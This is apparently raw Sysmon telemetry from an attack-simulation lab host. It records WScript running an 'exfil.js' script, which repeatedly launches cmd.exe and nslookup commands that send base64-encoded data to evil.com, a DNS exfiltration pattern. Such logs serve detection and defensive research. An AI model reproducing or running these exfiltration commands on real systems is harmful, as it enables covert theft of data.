14:16:35.085{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.085{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-DC40-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.085{2E1864BB-17C3-629A-DA40-000000005F02}54808028C:\Windows\system32\cmd.exe{2E1864BB-17C3-629A-DC40-000000005F02}5960C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.088{2E1864BB-17C3-629A-DC40-000000005F02}5960C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C3-629A-DA40-000000005F02}5480C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljocc.tmp 2>&1 354300x8000000000000000201441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{00000000-0000-0000-0000-000000000000}6036<unknown process>-udptruefalse127.0.0.1-52799-false127.0.0.1-53domain 354300x8000000000000000201440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.722{00000000-0000-0000-0000-000000000000}6036<unknown process>-udpfalsefalse127.0.0.1-52798-false127.0.0.1-53domain 354300x8000000000000000201439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.721{00000000-0000-0000-0000-000000000000}6036<unknown process>-udptruefalse127.0.0.1-52797-false127.0.0.1-53domain 10341000x8000000000000000201438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.038{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-DB40-000000005F02}4336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201437Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.038{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C3-629A-DB40-000000005F02}4336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201436Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.038{2E1864BB-17C3-629A-DB40-000000005F02}43365472C:\Windows\system32\conhost.exe{2E1864BB-17C3-629A-DA40-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201435Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.017{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-DB40-000000005F02}4336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201434Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201433Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201432Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201431Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201430Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C3-629A-DA40-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201429Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-17A1-629A-783D-000000005F02}55528060C:\Windows\System32\WScript.exe{2E1864BB-17C3-629A-DA40-000000005F02}5480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201428Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.008{2E1864BB-17C3-629A-DA40-000000005F02}5480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljocc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201427Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.000{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbvo.tmpMD5=7D9173BD0DB6CB1EF243CECFF708168B,SHA256=E1F06C46829F00B73E93E5CA6A77E87CA3F897BE9C930070FC4C0794E517005D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043943Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:35.966{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1BA210C777117D96C6BED57C637AA12,SHA256=F354F074734D9DC5064F13BEA7C91DC47BD57C3C310EDACC3E10E62D8FFE7482,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000043942Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:35.655{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-218MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201900Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.962{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0B41-000000005F02}7744C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.962{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C4-629A-0B41-000000005F02}7744C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.946{2E1864BB-17C4-629A-0B41-000000005F02}77441736C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0A41-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201897Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0B41-000000005F02}7744C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201896Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201895Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201894Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201893Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201892Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C4-629A-0A41-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201891Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.930{2E1864BB-17A1-629A-783D-000000005F02}55524228C:\Windows\System32\WScript.exe{2E1864BB-17C4-629A-0A41-000000005F02}6220C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201890Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.929{2E1864BB-17C4-629A-0A41-000000005F02}6220C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxafb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201889Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.926{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgiu.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201888Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.895{2E1864BB-17C4-629A-0841-000000005F02}71447536C:\Windows\system32\conhost.exe{2E1864BB-17C4-629A-0941-000000005F02}4624C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201887Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:36.895{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201886Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 